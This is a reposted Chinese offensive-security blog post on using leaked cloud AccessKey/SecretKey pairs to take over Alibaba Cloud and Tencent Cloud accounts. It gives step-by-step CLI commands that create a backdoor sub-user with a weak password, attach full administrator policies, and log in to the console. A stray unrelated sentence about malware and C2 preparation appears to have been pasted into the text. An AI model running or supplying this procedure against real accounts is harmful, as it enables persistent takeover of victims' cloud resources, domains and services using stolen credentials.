在云计算中,AK(Access Key)和SK(Secret Key)通常用于进行 API 调用,以便访问和管理云服务资源。这些密钥对于安全性至关重要,因为它们允许对云资源执行各种操作。如果泄露或不当使用,可能会导致严重的安全风险和数据泄露。
而在实战中,大部分文章基本是什么工具一把嗦嗦哈,看oss,rds,ecs,其实如果ak,sk权限过大,是可以创建子用户来登录云管的,说不定登进去就能接管域名,im服务等扩大攻防成果。
下面介绍腾讯云,阿里云的接管方式,其他云大差不差,看官方文档就能搞。
显示,长期和全面的准备阶段与第一个恶意软件样本的开发以及命令和控制(C2)基础设施的部署有关。
阿里云有一个ram账号,可以看看他的官方介绍
RAM用户由阿里云账号(主账号)或具有管理员权限的其他RAM用户,同时ram账号可以用ak,sk进行调用api创建
根据阿里云官方的命令行工具https://github.com/aliyun/aliyun-cli/blob/master/README-CN.md
配置 ak sk
./aliyun configure --profile akprofile
创建ram账号
查看别名./aliyun ram GetAccountAlias常见账号./aliyun aliyun ram CreateUser --UserName SxfnbQaxsb2333设置密码./aliyun ram CreateLoginProfile --UserName SxfnbQaxsb2333 --Password 123456设置权限./aliyun ram AttachPolicyToUser --PolicyType System --PolicyName AdministratorAccess --UserName SxfnbQax**2333
创建好账号后,查看该云的别名
./aliyun ram GetAccountAlias 获取id放在域名后面
登录账号为
创建的用户@+别名+.onaliyun.com
然后就可以用这个账号正常登录阿里云,和你自己账号登录阿里云一样
腾讯云也一样,只不过叫法不同,腾讯云叫子用户,与阿里云不同的是,腾讯云登录子用户需要主账号id才可以
我们下载其官方命令行工具
https://github.com/TencentCloud/tencentcloud-cli查看命令行命令
获取主用户idtccli cam GetUserAppId --cli-unfold-argument
创建子用户tccli cam AddUser –cli-unfold-argument --Name Sxfnb2333 --Remark sxf --ConsoleLogin 1 --Password '123456' --NeedResetPassword 0查询策略tccli cam ListPolicies --cli-unfold-argument给最高权限tccli cam AttachUserPolicy --cli-unfold-argument --PolicyId 1 --AttachUin 100035117703列出子用户tccli cam ListUsers --cli-unfold-argument
创建好后然后去登录
文章作者:先知社区(penso****)
文章来源:https://xz.aliyun.com/t/13538
原文始发于微信公众号(李白你好):如何利用官方工具AK、SK接管易怒平台
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论